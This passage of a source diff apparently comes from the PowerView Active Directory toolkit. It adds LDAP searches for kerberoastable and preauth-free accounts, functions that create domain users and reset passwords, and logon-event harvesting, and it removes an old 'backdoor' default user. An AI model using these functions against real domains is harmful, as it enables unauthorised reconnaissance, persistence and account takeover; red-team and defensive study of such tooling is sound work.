+            $Identity | Where-Object {$_} | ForEach-Object {
+                $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29')
+                if ($IdentityInstance -match '^S-1-') {
+                    $IdentityFilter += "(objectsid=$IdentityInstance)"
+                }
+                elseif ($IdentityInstance -match '^CN=') {
+                    $IdentityFilter += "(distinguishedname=$IdentityInstance)"
+                }
+                elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') {
+                    $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join ''
+                    $IdentityFilter += "(objectguid=$GuidByteString)"
+                }
+                elseif ($IdentityInstance.Contains('\')) {
+                    $ConvertedIdentityInstance = $IdentityInstance.Replace('\28', '(').Replace('\29', ')') | Convert-ADName -OutputType Canonical
+                    if ($ConvertedIdentityInstance) {
+                        $UserDomain = $ConvertedIdentityInstance.SubString(0, $ConvertedIdentityInstance.IndexOf('/'))
+                        $UserName = $IdentityInstance.Split('\')[1]
+                        $IdentityFilter += "(samAccountName=$UserName)"
+                        $SearcherArguments['Domain'] = $UserDomain
+                        Write-Verbose "[Get-DomainUser] Extracted domain '$UserDomain' from '$IdentityInstance'"
+                        $UserSearcher = Get-DomainSearcher @SearcherArguments
+                    }
+                }
+                else {
+                    $IdentityFilter += "(samAccountName=$IdentityInstance)"
+                }
+            }
+
+            if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {
+                $Filter += "(|$IdentityFilter)"
+            }
 
-            # if we're checking for unconstrained delegation
-            if($Unconstrained) {
-                Write-Verbose "Checking for unconstrained delegation"
-                $Filter += "(userAccountControl:1.2.840.113556.1.4.803:=524288)"
+            if ($PSBoundParameters['SPN']) {
+                Write-Verbose '[Get-DomainUser] Searching for non-null service principal names'
+                $Filter += '(servicePrincipalName=*)'
             }
-            if($AllowDelegation) {
-                Write-Verbose "Checking for users who can be delegated"
+            if ($PSBoundParameters['AllowDelegation']) {
+                Write-Verbose '[Get-DomainUser] Searching for users who can be delegated'
                 # negation of "Accounts that are sensitive and not trusted for delegation"
-                $Filter += "(!(userAccountControl:1.2.840.113556.1.4.803:=1048574))"
+                $Filter += '(!(userAccountControl:1.2.840.113556.1.4.803:=1048574))'
             }
-            if($AdminCount) {
-                Write-Verbose "Checking for adminCount=1"
-                $Filter += "(admincount=1)"
+            if ($PSBoundParameters['DisallowDelegation']) {
+                Write-Verbose '[Get-DomainUser] Searching for users who are sensitive and not trusted for delegation'
+                $Filter += '(userAccountControl:1.2.840.113556.1.4.803:=1048574)'
             }
-
-            # check if we're using a username filter or not
-            if($UserName) {
-                # samAccountType=805306368 indicates user objects
-                $UserSearcher.filter="(&(samAccountType=805306368)(samAccountName=$UserName)$Filter)"
+            if ($PSBoundParameters['AdminCount']) {
+                Write-Verbose '[Get-DomainUser] Searching for adminCount=1'
+                $Filter += '(admincount=1)'
             }
-            elseif($SPN) {
-                $UserSearcher.filter="(&(samAccountType=805306368)(servicePrincipalName=*)$Filter)"
+            if ($PSBoundParameters['TrustedToAuth']) {
+                Write-Verbose '[Get-DomainUser] Searching for users that are trusted to authenticate for other principals'
+                $Filter += '(msds-allowedtodelegateto=*)'
             }
-            else {
-                # filter is something like "(samAccountName=*blah*)" if specified
-                $UserSearcher.filter="(&(samAccountType=805306368)$Filter)"
+            if ($PSBoundParameters['PreauthNotRequired']) {
+                Write-Verbose '[Get-DomainUser] Searching for user accounts that do not require kerberos preauthenticate'
+                $Filter += '(userAccountControl:1.2.840.113556.1.4.803:=4194304)'
             }
+            if ($PSBoundParameters['LDAPFilter']) {
+                Write-Verbose "[Get-DomainUser] Using additional LDAP filter: $LDAPFilter"
+                $Filter += "$LDAPFilter"
+            }
+
+            $UserSearcher.filter = "(&(samAccountType=805306368)$Filter)"
+            Write-Verbose "[Get-DomainUser] filter string: $($UserSearcher.filter)"
 
-            $Results = $UserSearcher.FindAll()
+            if ($PSBoundParameters['FindOne']) { $Results = $UserSearcher.FindOne() }
+            else { $Results = $UserSearcher.FindAll() }
             $Results | Where-Object {$_} | ForEach-Object {
-                # convert/process the LDAP fields for each result
-                $User = Convert-LDAPProperty -Properties $_.Properties
-                $User.PSObject.TypeNames.Add('PowerView.User')
+                if ($PSBoundParameters['Raw']) {
+                    # return raw result objects
+                    $User = $_
+                    $User.PSObject.TypeNames.Insert(0, 'PowerView.User.Raw')
+                }
+                else {
+                    $User = Convert-LDAPProperty -Properties $_.Properties
+                    $User.PSObject.TypeNames.Insert(0, 'PowerView.User')
+                }
                 $User
             }
-            $Results.dispose()
+            if ($Results) {
+                try { $Results.dispose() }
+                catch {
+                    Write-Verbose "[Get-DomainUser] Error disposing of the Results object: $_"
+                }
+            }
             $UserSearcher.dispose()
         }
     }
 }
 
 
-function Add-NetUser {
+function New-DomainUser {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Creates a new domain user (assuming appropriate permissions) and returns the user object.
+
+TODO: implement all properties that New-ADUser implements (https://technet.microsoft.com/en-us/library/ee617253.aspx).
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-PrincipalContext  
+
+.DESCRIPTION
 
-        Adds a domain user or a local user to the current (or remote) machine,
-        if permissions allow, utilizing the WinNT service provider and
-        DirectoryServices.AccountManagement, respectively.
-        
-        The default behavior is to add a user to the local machine.
-        An optional group name to add the user to can be specified.
+First binds to the specified domain context using Get-PrincipalContext.
+The bound domain context is then used to create a new
+DirectoryServices.AccountManagement.UserPrincipal with the specified user properties.
 
-    .PARAMETER UserName
+.PARAMETER SamAccountName
 
-        The username to add. If not given, it defaults to 'backdoor'
+Specifies the Security Account Manager (SAM) account name of the user to create.
+Maximum of 256 characters. Mandatory.
 
-    .PARAMETER Password
+.PARAMETER AccountPassword
 
-        The password to set for the added user. If not given, it defaults to 'Password123!'
+Specifies the password for the created user. Mandatory.
 
-    .PARAMETER GroupName
+.PARAMETER Name
 
-        Group to optionally add the user to.
+Specifies the name of the user to create. If not provided, defaults to SamAccountName.
 
-    .PARAMETER ComputerName
+.PARAMETER DisplayName
 
-        Hostname to add the local user to, defaults to 'localhost'
+Specifies the display name of the user to create. If not provided, defaults to SamAccountName.
 
-    .PARAMETER Domain
+.PARAMETER Description
 
-        Specified domain to add the user to.
+Specifies the description of the user to create.
 
-    .EXAMPLE
+.PARAMETER Domain
 
-        PS C:\> Add-NetUser -UserName john -Password 'Password123!'
-        
-        Adds a localuser 'john' to the local machine with password of 'Password123!'
+Specifies the domain to use to search for user/group principals, defaults to the current domain.
 
-    .EXAMPLE
+.PARAMETER Credential
 
-        PS C:\> Add-NetUser -UserName john -Password 'Password123!' -ComputerName server.testlab.local
-        
-        Adds a localuser 'john' with password of 'Password123!' to server.testlab.local's local Administrators group.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Add-NetUser -UserName john -Password password -GroupName "Domain Admins" -Domain ''
-        
-        Adds the user "john" with password "password" to the current domain and adds
-        the user to the domain group "Domain Admins"
+$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+New-DomainUser -SamAccountName harmj0y2 -Description 'This is harmj0y' -AccountPassword $UserPassword
 
-    .EXAMPLE
+Creates the 'harmj0y2' user with the specified description and password.
 
-        PS C:\> Add-NetUser -UserName john -Password password -GroupName "Domain Admins" -Domain 'testing'
-        
-        Adds the user "john" with password "password" to the 'testing' domain and adds
-        the user to the domain group "Domain Admins"
+.EXAMPLE
 
-    .Link
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$user = New-DomainUser -SamAccountName harmj0y2 -Description 'This is harmj0y' -AccountPassword $UserPassword -Credential $Cred
 
-        http://blogs.technet.com/b/heyscriptingguy/archive/2010/11/23/use-powershell-to-create-local-user-accounts.aspx
+Creates the 'harmj0y2' user with the specified description and password, using the specified
+alternate credentials.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+New-DomainUser -SamAccountName andy -AccountPassword $UserPassword -Credential $Cred | Add-DomainGroupMember 'Domain Admins' -Credential $Cred
+
+Creates the 'andy' user with the specified description and password, using the specified
+alternate credentials, and adds the user to 'domain admins' using Add-DomainGroupMember
+and the alternate credentials.
+
+.OUTPUTS
+
+DirectoryServices.AccountManagement.UserPrincipal
+
+.LINK
+
+http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/
 #>
 
-    [CmdletBinding()]
-    Param (
-        [ValidateNotNullOrEmpty()]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('DirectoryServices.AccountManagement.UserPrincipal')]
+    Param(
+        [Parameter(Mandatory = $True)]
+        [ValidateLength(0, 256)]
         [String]
-        $UserName = 'backdoor',
+        $SamAccountName,
 
+        [Parameter(Mandatory = $True)]
         [ValidateNotNullOrEmpty()]
-        [String]
-        $Password = 'Password123!',
+        [Alias('Password')]
+        [Security.SecureString]
+        $AccountPassword,
 
         [ValidateNotNullOrEmpty()]
         [String]
-        $GroupName,
+        $Name,
 
         [ValidateNotNullOrEmpty()]
-        [Alias('HostName')]
         [String]
-        $ComputerName = 'localhost',
+        $DisplayName,
 
         [ValidateNotNullOrEmpty()]
         [String]
-        $Domain
-    )
+        $Description,
 
-    if ($Domain) {
-
-        $DomainObject = Get-NetDomain -Domain $Domain
-        if(-not $DomainObject) {
-            Write-Warning "Error in grabbing $Domain object"
-            return $Null
-        }
+        [ValidateNotNullOrEmpty()]
+        [String]
+        $Domain,
 
-        # add the assembly we need
-        Add-Type -AssemblyName System.DirectoryServices.AccountManagement
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
+    )
 
-        # http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/
-        # get the domain context
-        $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain), $DomainObject
+    $ContextArguments = @{
+        'Identity' = $SamAccountName
+    }
+    if ($PSBoundParameters['Domain']) { $ContextArguments['Domain'] = $Domain }
+    if ($PSBoundParameters['Credential']) { $ContextArguments['Credential'] = $Credential }
+    $Context = Get-PrincipalContext @ContextArguments
 
-        # create the user object
-        $User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList $Context
+    if ($Context) {
+        $User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList ($Context.Context)
 
-        # set user properties
-        $User.Name = $UserName
-        $User.SamAccountName = $UserName
-        $User.PasswordNotRequired = $False
-        $User.SetPassword($Password)
+        # set all the appropriate user parameters
+        $User.SamAccountName = $Context.Identity
+        $TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword)
+        $User.SetPassword($TempCred.GetNetworkCredential().Password)
         $User.Enabled = $True
+        $User.PasswordNotRequired = $False
 
-        Write-Verbose "Creating user $UserName to with password '$Password' in domain $Domain"
-
-        try {
-            # commit the user
-            $User.Save()
-            "[*] User $UserName successfully created in domain $Domain"
+        if ($PSBoundParameters['Name']) {
+            $User.Name = $Name
         }
-        catch {
-            Write-Warning '[!] User already exists!'
-            return
+        else {
+            $User.Name = $Context.Identity
+        }
+        if ($PSBoundParameters['DisplayName']) {
+            $User.DisplayName = $DisplayName
+        }
+        else {
+            $User.DisplayName = $Context.Identity
         }
-    }
-    else {
-        
-        Write-Verbose "Creating user $UserName to with password '$Password' on $ComputerName"
 
-        # if it's not a domain add, it's a local machine add
-        $ObjOu = [ADSI]"WinNT://$ComputerName"
-        $ObjUser = $ObjOu.Create('User', $UserName)
-        $ObjUser.SetPassword($Password)
+        if ($PSBoundParameters['Description']) {
+            $User.Description = $Description
+        }
 
-        # commit the changes to the local machine
+        Write-Verbose "[New-DomainUser] Attempting to create user '$SamAccountName'"
         try {
-            $Null = $ObjUser.SetInfo()
-            "[*] User $UserName successfully created on host $ComputerName"
+            $Null = $User.Save()
+            Write-Verbose "[New-DomainUser] User '$SamAccountName' successfully created"
+            $User
         }
         catch {
-            Write-Warning '[!] Account already exists!'
-            return
-        }
-    }
-
-    # if a group is specified, invoke Add-NetGroupUser and return its value
-    if ($GroupName) {
-        # if we're adding the user to a domain
-        if ($Domain) {
-            Add-NetGroupUser -UserName $UserName -GroupName $GroupName -Domain $Domain
-            "[*] User $UserName successfully added to group $GroupName in domain $Domain"
-        }
-        # otherwise, we're adding to a local group
-        else {
-            Add-NetGroupUser -UserName $UserName -GroupName $GroupName -ComputerName $ComputerName
-            "[*] User $UserName successfully added to group $GroupName on host $ComputerName"
+            Write-Warning "[New-DomainUser] Error creating user '$SamAccountName' : $_"
         }
     }
 }
 
 
-function Add-NetGroupUser {
+function Set-DomainUserPassword {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Sets the password for a given user identity.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-PrincipalContext  
+
+.DESCRIPTION
+
+First binds to the specified domain context using Get-PrincipalContext.
+The bound domain context is then used to search for the specified user -Identity,
+which returns a DirectoryServices.AccountManagement.UserPrincipal object. The
+SetPassword() function is then invoked on the user, setting the password to -AccountPassword.
+
+.PARAMETER Identity
+
+A user SamAccountName (e.g. User1), DistinguishedName (e.g. CN=user1,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1113), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
+specifying the user to reset the password for.
+
+.PARAMETER AccountPassword
+
+Specifies the password to reset the target user's to. Mandatory.
+
+.PARAMETER Domain
 
-        Adds a user to a domain group or a local group on the current (or remote) machine,
-        if permissions allow, utilizing the WinNT service provider and
-        DirectoryServices.AccountManagement, respectively.
+Specifies the domain to use to search for the user identity, defaults to the current domain.
 
-    .PARAMETER UserName
+.PARAMETER Credential
 
-        The domain username to query for.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
 
-    .PARAMETER GroupName
+.EXAMPLE
 
-        Group to add the user to.
+$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+Set-DomainUserPassword -Identity andy -AccountPassword $UserPassword
 
-    .PARAMETER ComputerName
+Resets the password for 'andy' to the password specified.
 
-        Hostname to add the user to, defaults to localhost.
+.EXAMPLE
 
-    .PARAMETER Domain
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+Set-DomainUserPassword -Identity andy -AccountPassword $UserPassword -Credential $Cred
 
-        Domain to add the user to.
+Resets the password for 'andy' usering the alternate credentials specified.
 
-    .EXAMPLE
+.OUTPUTS
 
-        PS C:\> Add-NetGroupUser -UserName john -GroupName Administrators
-        
-        Adds a localuser "john" to the local group "Administrators"
+DirectoryServices.AccountManagement.UserPrincipal
 
-    .EXAMPLE
+.LINK
 
-        PS C:\> Add-NetGroupUser -UserName john -GroupName "Domain Admins" -Domain dev.local
-        
-        Adds the existing user "john" to the domain group "Domain Admins" in "dev.local"
+http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/
 #>
 
-    [CmdletBinding()]
-    param(
-        [Parameter(Mandatory = $True)]
-        [ValidateNotNullOrEmpty()]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('DirectoryServices.AccountManagement.UserPrincipal')]
+    Param(
+        [Parameter(Position = 0, Mandatory = $True)]
+        [Alias('UserName', 'UserIdentity', 'User')]
         [String]
-        $UserName,
+        $Identity,
 
         [Parameter(Mandatory = $True)]
         [ValidateNotNullOrEmpty()]
-        [String]
-        $GroupName,
+        [Alias('Password')]
+        [Security.SecureString]
+        $AccountPassword,
 
         [ValidateNotNullOrEmpty()]
-        [Alias('HostName')]
         [String]
-        $ComputerName,
+        $Domain,
 
-        [String]
-        $Domain
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
     )
 
-    # add the assembly if we need it
-    Add-Type -AssemblyName System.DirectoryServices.AccountManagement
+    $ContextArguments = @{ 'Identity' = $Identity }
+    if ($PSBoundParameters['Domain']) { $ContextArguments['Domain'] = $Domain }
+    if ($PSBoundParameters['Credential']) { $ContextArguments['Credential'] = $Credential }
+    $Context = Get-PrincipalContext @ContextArguments
 
-    # if we're adding to a remote host's local group, use the WinNT provider
-    if($ComputerName -and ($ComputerName -ne "localhost")) {
-        try {
-            Write-Verbose "Adding user $UserName to $GroupName on host $ComputerName"
-            ([ADSI]"WinNT://$ComputerName/$GroupName,group").add("WinNT://$ComputerName/$UserName,user")
-            "[*] User $UserName successfully added to group $GroupName on $ComputerName"
-        }
-        catch {
-            Write-Warning "[!] Error adding user $UserName to group $GroupName on $ComputerName"
-            return
-        }
-    }
+    if ($Context) {
+        $User = [System.DirectoryServices.AccountManagement.UserPrincipal]::FindByIdentity($Context.Context, $Identity)
 
-    # otherwise it's a local machine or domain add
-    else {
-        try {
-            if ($Domain) {
-                Write-Verbose "Adding user $UserName to $GroupName on domain $Domain"
-                $CT = [System.DirectoryServices.AccountManagement.ContextType]::Domain
-                $DomainObject = Get-NetDomain -Domain $Domain
-                if(-not $DomainObject) {
-                    return $Null
-                }
-                # get the full principal context
-                $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList $CT, $DomainObject            
+        if ($User) {
+            Write-Verbose "[Set-DomainUserPassword] Attempting to set the password for user '$Identity'"
+            try {
+                $TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword)
+                $User.SetPassword($TempCred.GetNetworkCredential().Password)
+
+                $Null = $User.Save()
+                Write-Verbose "[Set-DomainUserPassword] Password for user '$Identity' successfully reset"
             }
-            else {
-                # otherwise, get the local machine context
-                Write-Verbose "Adding user $UserName to $GroupName on localhost"
-                $Context = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine, $Env:ComputerName)
+            catch {
+                Write-Warning "[Set-DomainUserPassword] Error setting password for user '$Identity' : $_"
             }
-
-            # find the particular group
-            $Group = [System.DirectoryServices.AccountManagement.GroupPrincipal]::FindByIdentity($Context,$GroupName)
-
-            # add the particular user to the group
-            $Group.Members.add($Context, [System.DirectoryServices.AccountManagement.IdentityType]::SamAccountName, $UserName)
-
-            # commit the changes
-            $Group.Save()
         }
-        catch {
-            Write-Warning "Error adding $UserName to $GroupName : $_"
+        else {
+            Write-Warning "[Set-DomainUserPassword] Unable to find user '$Identity'"
         }
     }
 }
 
 
-function Get-UserProperty {
+function Get-DomainUserEvent {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Enumerate account logon events (ID 4624) and Logon with explicit credential
+events (ID 4648) from the specified host (default of the localhost).
+
+Author: Lee Christensen (@tifkin_), Justin Warner (@sixdub), Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: None  
+
+.DESCRIPTION
 
-        Returns a list of all user object properties. If a property
-        name is specified, it returns all [user:property] values.
+This function uses an XML path filter passed to Get-WinEvent to retrieve
+security events with IDs of 4624 (logon events) or 4648 (explicit credential
+logon events) from -StartTime (default of now-1 day) to -EndTime (default of now).
+A maximum of -MaxEvents (default of 5000) are returned.
 
-        Taken directly from @obscuresec's post:
-            http://obscuresecurity.blogspot.com/2014/04/ADSISearcher.html
+.PARAMETER ComputerName
 
-    .PARAMETER Properties
+Specifies the computer name to retrieve events from, default of localhost.
 
-        Property names to extract for users.
+.PARAMETER StartTime
 
-    .PARAMETER Domain
+The [DateTime] object representing the start of when to collect events.
+Default of [DateTime]::Now.AddDays(-1).
 
-        The domain to query for user properties, defaults to the current domain.
+.PARAMETER EndTime
 
-    .PARAMETER DomainController
+The [DateTime] object representing the end of when to collect events.
+Default of [DateTime]::Now.
 
-        Domain controller to reflect LDAP queries through.
+.PARAMETER MaxEvents
 
-    .PARAMETER PageSize
+The maximum number of events to retrieve. Default of 5000.
 
-        The PageSize to set for the LDAP searcher object.
+.PARAMETER Credential
 
-    .PARAMETER Credential
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target computer.
 
-        A [Management.Automation.PSCredential] object of alternate credentials
-        for connection to the target domain.
+.EXAMPLE
 
-    .EXAMPLE
+Get-DomainUserEvent
 
-        PS C:\> Get-UserProperty -Domain testing
-        
-        Returns all user properties for users in the 'testing' domain.
+Return logon events on the local machine.
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Get-UserProperty -Properties ssn,lastlogon,location
-        
-        Returns all an array of user/ssn/lastlogin/location combinations
-        for users in the current domain.
+Get-DomainController | Get-DomainUserEvent -StartTime ([DateTime]::Now.AddDays(-3))
 
-    .LINK
+Return all logon events from the last 3 days from every domain controller in the current domain.
 
-        http://obscuresecurity.blogspot.com/2014/04/ADSISearcher.html
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainUserEvent -ComputerName PRIMARY.testlab.local -Credential $Cred -MaxEvents 1000
+
+Return a max of 1000 logon events from the specified machine using the specified alternate credentials.
+
+.OUTPUTS
+
+PowerView.LogonEvent
+
+PowerView.ExplicitCredentialLogonEvent
+
+.LINK
+
+http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerView.LogonEvent')]
+    [OutputType('PowerView.ExplicitCredentialLogonEvent')]
     [CmdletBinding()]
-    param(
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('dnshostname', 'HostName', 'name')]
+        [ValidateNotNullOrEmpty()]
         [String[]]
-        $Properties,
+        $ComputerName = $Env:COMPUTERNAME,
 
-        [String]
-        $Domain,
-        
-        [String]
-        $DomainController,
+        [ValidateNotNullOrEmpty()]
+        [DateTime]
+        $StartTime = [DateTime]::Now.AddDays(-1),
+
+        [ValidateNotNullOrEmpty()]
+        [DateTime]
+        $EndTime = [DateTime]::Now,
 
-        [ValidateRange(1,10000)] 
+        [ValidateRange(1, 1000000)]
         [Int]
-        $PageSize = 200,
+        $MaxEvents = 5000,
 
         [Management.Automation.PSCredential]
-        $Credential
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
     )
 
-    if($Properties) {
-        # extract out the set of all properties for each object
-        $Properties = ,"name" + $Properties
-        Get-NetUser -Domain $Domain -DomainController $DomainController -PageSize $PageSize -Credential $Credential | Select-Object -Property $Properties
+    BEGIN {
+        # the XML filter we're passing to Get-WinEvent
+        $XPathFilter = @"
+<QueryList>
+    <Query Id="0" Path="Security">
+
+        <!-- Logon events -->
+        <Select Path="Security">
+            *[
+                System[
+                    Provider[
+                        @Name='Microsoft-Windows-Security-Auditing'
+                    ]
+                    and (Level=4 or Level=0) and (EventID=4624)
+                    and TimeCreated[
+                        @SystemTime&gt;='$($StartTime.ToUniversalTime().ToString('s'))' and @SystemTime&lt;='$($EndTime.ToUniversalTime().ToString('s'))'
+                    ]
+                ]
+            ]
+            and
+            *[EventData[Data[@Name='TargetUserName'] != 'ANONYMOUS LOGON']]
+        </Select>
+
+        <!-- Logon with explicit credential events -->
+        <Select Path="Security">
+            *[
+                System[
+                    Provider[
+                        @Name='Microsoft-Windows-Security-Auditing'
+                    ]
+                    and (Level=4 or Level=0) and (EventID=4648)
+                    and TimeCreated[
+                        @SystemTime&gt;='$($StartTime.ToUniversalTime().ToString('s'))' and @SystemTime&lt;='$($EndTime.ToUniversalTime().ToString('s'))'
+                    ]
+                ]
+            ]
+        </Select>
+
+        <Suppress Path="Security">
+            *[
+                System[
+                    Provider[
+                        @Name='Microsoft-Windows-Security-Auditing'
+                    ]
+                    and
+                    (Level=4 or Level=0) and (EventID=4624 or EventID=4625 or EventID=4634)
+                ]
+            ]
+            and
+            *[
+                EventData[
+                    (
+                        (Data[@Name='LogonType']='5' or Data[@Name='LogonType']='0')
+                        or
+                        Data[@Name='TargetUserName']='ANONYMOUS LOGON'
+                        or
+                        Data[@Name='TargetUserSID']='S-1-5-18'
+                    )
+                ]
+            ]
+        </Suppress>
+    </Query>
+</QueryList>
+"@
+        $EventArguments = @{
+            'FilterXPath' = $XPathFilter
+            'LogName' = 'Security'
+            'MaxEvents' = $MaxEvents
+        }
+        if ($PSBoundParameters['Credential']) { $EventArguments['Credential'] = $Credential }
     }
-    else {
-        # extract out just the property names
-        Get-NetUser -Domain $Domain -DomainController $DomainController -PageSize $PageSize -Credential $Credential | Select-Object -First 1 | Get-Member -MemberType *Property | Select-Object -Property 'Name'
+
+    PROCESS {
+        ForEach ($Computer in $ComputerName) {
+
+            $EventArguments['ComputerName'] = $Computer
+
+            Get-WinEvent @EventArguments| ForEach-Object {
+                $Event = $_
+                $Properties = $Event.Properties
+                Switch ($Event.Id) {
+                    # logon event
+                    4624 {
+                        # skip computer logons, for now...
+                        if(-not $Properties[5].Value.EndsWith('$')) {
+                            $Output = New-Object PSObject -Property @{
+                                ComputerName              = $Computer
+                                TimeCreated               = $Event.TimeCreated
+                                EventId                   = $Event.Id
+                                SubjectUserSid            = $Properties[0].Value.ToString()
+                                SubjectUserName           = $Properties[1].Value
+                                SubjectDomainName         = $Properties[2].Value
+                                SubjectLogonId            = $Properties[3].Value
+                                TargetUserSid             = $Properties[4].Value.ToString()
+                                TargetUserName            = $Properties[5].Value
+                                TargetDomainName          = $Properties[6].Value
+                                TargetLogonId             = $Properties[7].Value
+                                LogonType                 = $Properties[8].Value
+                                LogonProcessName          = $Properties[9].Value
+                                AuthenticationPackageName = $Properties[10].Value
+                                WorkstationName           = $Properties[11].Value
+                                LogonGuid                 = $Properties[12].Value
+                                TransmittedServices       = $Properties[13].Value
+                                LmPackageName             = $Properties[14].Value
+                                KeyLength                 = $Properties[15].Value
+                                ProcessId                 = $Properties[16].Value
+                                ProcessName               = $Properties[17].Value
+                                IpAddress                 = $Properties[18].Value
+                                IpPort                    = $Properties[19].Value
+                                ImpersonationLevel        = $Properties[20].Value
+                                RestrictedAdminMode       = $Properties[21].Value
+                                TargetOutboundUserName    = $Properties[22].Value
+                                TargetOutboundDomainName  = $Properties[23].Value
+                                VirtualAccount            = $Properties[24].Value
+                                TargetLinkedLogonId       = $Properties[25].Value
+                                ElevatedToken             = $Properties[26].Value
+                            }
+                            $Output.PSObject.TypeNames.Insert(0, 'PowerView.LogonEvent')
+                            $Output
+                        }
+                    }
+
+                    # logon with explicit credential
+                    4648 {
+                        # skip computer logons, for now...
+                        if((-not $Properties[5].Value.EndsWith('$')) -and ($Properties[11].Value -match 'taskhost\.exe')) {
+                            $Output = New-Object PSObject -Property @{
+                                ComputerName              = $Computer
+                                TimeCreated       = $Event.TimeCreated
+                                EventId           = $Event.Id
+                                SubjectUserSid    = $Properties[0].Value.ToString()
+                                SubjectUserName   = $Properties[1].Value
+                                SubjectDomainName = $Properties[2].Value
+                                SubjectLogonId    = $Properties[3].Value
+                                LogonGuid         = $Properties[4].Value.ToString()
+                                TargetUserName    = $Properties[5].Value
+                                TargetDomainName  = $Properties[6].Value
+                                TargetLogonGuid   = $Properties[7].Value
+                                TargetServerName  = $Properties[8].Value
+                                TargetInfo        = $Properties[9].Value
+                                ProcessId         = $Properties[10].Value
+                                ProcessName       = $Properties[11].Value
+                                IpAddress         = $Properties[12].Value
+                                IpPort            = $Properties[13].Value
+                            }
+                            $Output.PSObject.TypeNames.Insert(0, 'PowerView.ExplicitCredentialLogonEvent')
+                            $Output
+                        }
+                    }
+                    default {
+                        Write-Warning "No handler exists for event ID: $($Event.Id)"
+                    }
+                }
+            }
+        }
     }
 }
 
 
-filter Find-UserField {
+function Get-DomainGUIDMap {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Helper to build a hash table of [GUID] -> resolved names for the current or specified Domain.
 
-        Searches user object fields for a given word (default *pass*). Default
-        field being searched is 'description'.
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-DomainSearcher, Get-Forest  
 
-        Taken directly from @obscuresec's post:
-            http://obscuresecurity.blogspot.com/2014/04/ADSISearcher.html
+.DESCRIPTION
 
-    .PARAMETER SearchTerm
+Searches the forest schema location (CN=Schema,CN=Configuration,DC=testlab,DC=local) for
+all objects with schemaIDGUID set and translates the GUIDs discovered to human-readable names.
+Then searches the extended rights location (CN=Extended-Rights,CN=Configuration,DC=testlab,DC=local)
+for objects where objectClass=controlAccessRight, translating the GUIDs again.
 
-        Term to search for, default of "pass".
+Heavily adapted from http://blogs.technet.com/b/ashleymcglone/archive/2013/03/25/active-directory-ou-permissions-report-free-powershell-script-download.aspx
 
-    .PARAMETER SearchField
+.PARAMETER Domain
 
